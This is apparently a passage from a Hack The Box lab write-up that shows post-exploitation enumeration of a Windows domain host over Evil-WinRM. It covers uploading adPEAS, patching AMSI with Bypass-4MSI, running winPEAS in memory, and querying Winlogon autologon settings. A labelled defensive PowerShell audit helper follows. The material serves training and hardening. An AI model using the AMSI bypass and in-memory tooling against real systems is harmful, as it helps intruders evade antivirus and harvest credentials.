PEAS
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> upload adPEAS.ps1
info: Uploading /home/kali/archive/htb/labs/apt/adPEAS.ps1 to C:\Users\henry.vinson_adm\Documents\adPEAS.ps1
data: 4159704 bytes of 4159704 bytes copied
info: Upload successful!
Delivery complete
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> . .\adPEAS.ps1
At C:\Users\henry.vinson_adm\Documents\adPEAS.ps1:4368 char:20
+ function New-ASReq {
+                    ~
Missing closing '}' in statement block or type definition.
At C:\Users\henry.vinson_adm\Documents\adPEAS.ps1:4368 char:20
+ function New-ASReq {
+                    ~
    + CategoryInfo          : ParserError: (:) [], ParseException
    + FullyQualifiedErrorId : MissingEndCurlyBrace
I am unable to load the adPEAS.ps1 PowerShell script into the current PowerShell session, as it seems to have been tampered with during delivery.
This is likely caused by the potential presence of AV.
Thankfully, there is a quick solution for that.
Evil-WinRM
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> menu
By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
Evil-WinRM comes with a set of tools for convenience, one of which is the Bypass-4MSI cmdlet, which patches AMSI protection in the current session.
Completed
Now, using the built-in Invoke-Binary cmdlet, I run winPEASx64.exe in memory.
While there are many parts that cannot be enumerated due to lack of privileges, I will grab whatever is available.
Environment Variable
System
LAPS
LSA
Credentials Guard
AV
Definitely not true
UAC
PowerShell
C:\Users\henry.vinson_adm\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
KrbRelayUp
NTLM
LanmanCompatibilityLevel : 2
AMSI
AMSI by Defender as expected
Current Privileges (henry.vinson_adm)
AutoLogon
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> cmd /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DisableBackButton REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x2e75b4242a
ShutdownFlags REG_DWORD 0x13
DefaultDomainName REG_SZ htb.local
AutoAdminLogon REG_SZ 1
DefaultUserName REG_SZ henry.vinson
DisableLockWorkstation REG_DWORD 0x0
AutoLogonSID REG_SZ S-1-5-21-2993095098-2100462451-206186470-1105
LastUsedUsername REG_SZ henry.vinson
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
Nothing interesting
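From a hardening point of view the two settings surfaced above are worth a second look: AutoAdminLogon is 1 with DefaultUserName henry.vinson, and LanmanCompatibilityLevel is 2. The following PowerShell audit helper is an added example, not part of the original writeup and not winPEAS code. It reads the same Winlogon key queried above plus the LSA key that holds LmCompatibilityLevel and reports each setting with a risk rating. It assumes it is run on the host under review with read access to HKLM (which any local user has); the function names and the risk labels are my own.

```powershell
# Added audit helper (not from the original writeup): re-check the autologon
# and LAN Manager authentication settings that the enumeration above exposed.

function Get-WinlogonAutoLogonFinding {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $wl  = Get-ItemProperty -Path $key -ErrorAction Stop

    # AutoAdminLogon is a REG_SZ holding "0" or "1", exactly as in the reg query output.
    $enabled   = ($wl.AutoAdminLogon -eq '1')
    # A plaintext DefaultPassword REG_SZ is the worst case. When it is absent (as above)
    # the password, if one is configured, is held in the DefaultPassword LSA secret instead.
    $plaintext = -not [string]::IsNullOrEmpty($wl.DefaultPassword)

    if ($plaintext)    { $risk = 'High' }
    elseif ($enabled)  { $risk = 'Medium' }
    else               { $risk = 'None' }

    $user = $null
    if ($enabled) { $user = '{0}\{1}' -f $wl.DefaultDomainName, $wl.DefaultUserName }

    $advice = 'OK'
    if ($enabled) {
        $advice = 'Set AutoAdminLogon to 0 and remove DefaultPassword (registry value and LSA secret) unless this is a dedicated kiosk.'
    }

    [pscustomobject]@{
        Check     = 'AutoAdminLogon'
        Enabled   = $enabled
        User      = $user
        Plaintext = $plaintext
        Risk      = $risk
        Advice    = $advice
    }
}

function Get-LmCompatibilityFinding {
    $key   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $level = (Get-ItemProperty -Path $key -Name LmCompatibilityLevel -ErrorAction SilentlyContinue).LmCompatibilityLevel
    # When the value is absent, supported Windows versions behave as level 3.
    if ($null -eq $level) { $level = 3 }

    # 0-2: the client still answers challenges with LM/NTLMv1.
    # 3-4: the client sends NTLMv2 only.
    # 5:   NTLMv2 only, and a DC additionally refuses LM and NTLMv1 from others.
    if ($level -lt 3)     { $risk = 'High' }
    elseif ($level -lt 5) { $risk = 'Medium' }
    else                  { $risk = 'None' }

    $advice = 'OK'
    if ($level -lt 5) {
        $advice = 'Raise to 5 via Group Policy: Network security: LAN Manager authentication level.'
    }

    [pscustomobject]@{
        Check  = 'LmCompatibilityLevel'
        Level  = $level
        Risk   = $risk
        Advice = $advice
    }
}

# Usage: print both findings as a table.
Get-WinlogonAutoLogonFinding, Get-LmCompatibilityFinding | Format-List
```

Against the output shown above the first function would report Enabled = True, Plaintext = False and Risk = Medium for htb.local\henry.vinson, and the second would report Level = 2 with Risk = High, since a level below 3 still lets the client answer with NTLMv1. The functions deliberately return objects rather than text so the results can be piped into a wider baseline check or exported for a report.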
Installed Programs
LAPS is installed?